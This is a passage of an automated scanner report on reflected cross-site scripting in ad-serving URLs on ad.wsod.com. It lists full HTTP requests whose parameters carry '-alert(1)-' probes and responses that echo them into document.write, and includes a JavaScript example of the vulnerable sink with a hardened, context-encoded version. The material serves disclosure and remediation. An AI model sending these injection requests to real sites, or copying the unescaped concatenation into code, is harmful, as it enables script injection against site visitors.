GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=48323960b5f'-alert(1)-'19e5a4bf28e&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:42:55 GMT; path=/
Set-Cookie: i_1=25:1538:693:113:0:42421:1300909375:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:42:55 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=48323960b5f'-alert(1)-'19e5a4bf28e&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485
...[SNIP]...

1.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d136c'-alert(1)-'a86864c90b7 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443d136c'-alert(1)-'a86864c90b7&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:42:27 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909347:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:42:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443d136c'-alert(1)-'a86864c90b7&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163
...[SNIP]...

1.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68b11'-alert(1)-'3ef9baa7320 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=68b11'-alert(1)-'3ef9baa7320 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:44:34 GMT; path=/
Set-Cookie: i_1=25:1538:693:113:0:42421:1300909474:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:44:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=68b11'-alert(1)-'3ef9baa7320http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.693.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

1.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7201'-alert(1)-'8f879f37d5f was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805c7201'-alert(1)-'8f879f37d5f&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:43:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:43:46 GMT; path=/
Set-Cookie: i_1=25:1538:822:113:0:42421:1300909426:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:43:46 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805c7201'-alert(1)-'8f879f37d5f&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.822.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to
...[SNIP]...

1.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b904b'-alert(1)-'70b0bdea029 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169b904b'-alert(1)-'70b0bdea029&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:43:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:43:20 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909400:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:43:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169b904b'-alert(1)-'70b0bdea029&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46
...[SNIP]...

1.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60d06'-alert(1)-'3ddd00bf1cc was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158960d06'-alert(1)-'3ddd00bf1cc&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:44:01 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909441:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:44:01 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158960d06'-alert(1)-'3ddd00bf1cc&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.134.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out mor
...[SNIP]...

1.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803b7'-alert(1)-'f122ed830e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&803b7'-alert(1)-'f122ed830e3=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:45:33 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42422:1300909533:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:45:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&803b7'-alert(1)-'f122ed830e3=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.134.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...
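The findings on this path (AdID, FlightID, Redirect, Segments, TargetID, Values and the parameter name) all share one sink: a click-through URL is assembled from the query string and written into the page through document.write('<a href="...">'). The block below is an added example, not code from the XSS.CX report or from ad.wsod.com. It reproduces that sink, shows the report's AdID probe breaking out of the string literal, and puts a hardened renderer beside it that encodes the value for each context it passes through (URL component, HTML attribute, JavaScript string). The later findings on the dovflta path, where the same values land in a double-quoted `<a href>` attribute, are covered by the attribute-encoding layer. The probe and parameter names are taken from the report; renderVulnerable, renderHardened, htmlAttr, jsString, runAdScript and CLICK_BASE are constructed here for illustration, and the stub document/alert stand in for a browser.

```javascript
// Added example, not code from the XSS.CX report or from ad.wsod.com.
// Reproduces the document.write('<a href="...">') sink seen in the responses
// and a hardened version of it. Probe and parameter names are from the report;
// everything else here is constructed for illustration.

const PROBE = "60b5f'-alert(1)-'19e5a4bf28e"; // AdID probe from the report
const CLICK_BASE = "http://ads.cnn.com/event.ng/Type=click"; // click URL from the report

// Vulnerable: raw parameter values are concatenated straight into JS source.
// A single quote in any value ends the string literal, the rest is parsed as
// code, and the second quote in the probe re-opens a literal so the script
// stays syntactically valid.
function renderVulnerable(params) {
  const qs = Object.entries(params).map(([k, v]) => `${k}=${v}`).join("&");
  return `document.write('<a href="${CLICK_BASE}&${qs}">');`;
}

// HTML attribute encoding for the href value.
function htmlAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/'/g, "&#39;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// JS string literal encoding: JSON.stringify escapes quotes and backslashes;
// < and > are escaped too so the literal can never contain "</script>".
function jsString(s) {
  return JSON.stringify(s).replace(/</g, "\\u003c").replace(/>/g, "\\u003e");
}

// Hardened: encode for every context the value passes through, innermost
// first: URL query component, then HTML attribute, then JS string literal.
// encodeURIComponent leaves ' ( ) untouched, so on its own it would not have
// stopped this probe; the jsString layer is what protects the document.write
// argument.
function renderHardened(params) {
  const qs = Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
  const href = htmlAttr(`${CLICK_BASE}&${qs}`);
  return `document.write(${jsString(`<a href="${href}">`)});`;
}

// Executes a generated script with a stub document and alert and records what
// document.write received and whether alert fired: the check a tester would
// otherwise do by loading the response in a browser.
function runAdScript(src) {
  const result = { written: [], alerts: [] };
  const fakeDocument = { write: (s) => result.written.push(String(s)) };
  const fakeAlert = (x) => { result.alerts.push(x); };
  new Function("document", "alert", src)(fakeDocument, fakeAlert);
  return result;
}

// Constructed sample request: the report's parameters with the probe appended
// to AdID, exactly as the scanner submitted it.
const sampleParams = { FlightID: "351443", AdID: "483239" + PROBE, TargetID: "16169" };
const vulnResult = runAdScript(renderVulnerable(sampleParams));
const safeResult = runAdScript(renderHardened(sampleParams));
console.log("vulnerable: alert fired", vulnResult.alerts.length, "time(s); wrote", vulnResult.written);
console.log("hardened:   alert fired", safeResult.alerts.length, "time(s); wrote", safeResult.written);
```

In the vulnerable case document.write receives NaN, because the expression the browser actually evaluates is `'<a href="...AdID=48323960b5f' - alert(1) - '19e5a4bf28e...">'`; the anchor is never written, which is why a broken ad is a useful secondary indicator when triaging this sink. In the hardened case the anchor is written with the probe intact but inert (`&#39;` in the attribute, a proper string literal in the script).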

1.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4976e"-alert(1)-"161b2a8b1d2 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

